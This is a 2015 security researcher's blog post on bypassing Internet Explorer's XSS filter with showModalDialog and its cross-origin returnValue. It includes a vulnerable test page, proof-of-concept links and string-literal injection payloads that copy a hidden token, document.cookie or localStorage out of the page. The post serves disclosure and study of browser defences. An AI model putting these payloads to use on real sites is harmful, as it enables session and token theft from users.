Tuesday, June 16, 2015

Bypassing IE's XSS Filter with showModalDialog

Hi there! I'm Masato Kinugawa. Finally, I started my blog in English :)
Also I will continue to write in Japanese as until now: http://masatokinugawa.l0.cm/
Today, I want to share IE's XSS filter bypass with showModalDialog.

showModalDialog function is old and has been removed from the web standards, but it has unique mechanism. I thought it might make my day. That's why I started looking into it.
The function is still supported by IE, Firefox and Safari.

First of all, let's recap usage of showModalDialog.


The first argument is URL which you want to open in the modal dialog.
The second argument is the argument which you want to pass to the modal dialog. And you can use it through window.dialogArguments property in the modal window.


To pass argument through window.dialogArguments, it seems that two windows must be same origin.

But it is different in case of returnValue. Two windows don't have to be same origin in Safari and IE. (Only Firefox needs same origin)

Here is my test page:
http://vulnerabledoma.in/showModalDialog/opener.html

Safari can pass it to different origin simply. Please test from the "x-origin" button.
To reproduce on IE, we need 3xx redirect. Please test from the "x-origin(redirect)" button.

This behavior means that we can pass information to another origin's page via returnValue property in Safari and IE. It might make a hole in some web application. But of course, I don't want to enlighten secure usage of showModalDialog in 2015 :)

Let's go to the main, bypass IE's XSS filter.


Exploitable Conditions:
  1. XSS exists in string literal of JS.
  2. Any JS property contains sensitive information.

The following is my test page:

http://vulnerabledoma.in/xss_token?q=[XSS_HERE]
<form name=form>
<input type=hidden name=token value=f9d150048b>
</form>
<script>var q="[XSS_HERE]"</script>

Seeing is believing. Please go to the following PoC using IE:

http://l0.cm/xssfilter_bypass/showModalDialog.html

If it goes well, you can see token strings in alert when you closed the modal dialog.

Let's take a look at details. The redirect takes you to:

http://vulnerabledoma.in/xss_token?q=%22%3BreturnValue=form.token.value//

The payload is injected:
<form name=form>
<input type=hidden name=token value=f9d150048b>
</form>
<script>var q="";returnValue=form.token.value//"</script>
Then, the token is passed into returnValue. Yeah!!

Needless to say, also it works:

";returnValue=document.cookie//
";returnValue=localStorage.key//

I have tried unsuccessfully to access other page's window object through window.opener. Any idea?

That's all. Understood? :)

FYI, I have blogged about some XSS filter bypass techniques in the past. (Sorry, Japanese text only)
If you are interested in other bypasses, please read using Google Translate.


ブラウザのXSS保護機能をバイパスする(1) (2012/2)
ブラウザのXSS保護機能をバイパスする(2) (2012/3)
ブラウザのXSS保護機能をバイパスする(3) (2012/9)
ブラウザのXSS保護機能をバイパスする(4) (2014/9)
ブラウザのXSS保護機能をバイパスする(5) (2014/10)

I'm going to continue to write blog in English as far as possible. 
Thank you!

Update(2015/6/17)

I found a way to pass other same-origin page's information via returnValue.
Anyway please go to the following page and click the "go" button.

http://l0.cm/xssfilter_bypass/showModalDialog2.html

If it goes well, you can see "<h1>This is secret Text!</h1>" of  other same-origin page's information in alert dialog. In this PoC, we don't need 3xx redirect. It seems that we can set returnValue from x-origin page in iframe which exists in showModalDialog.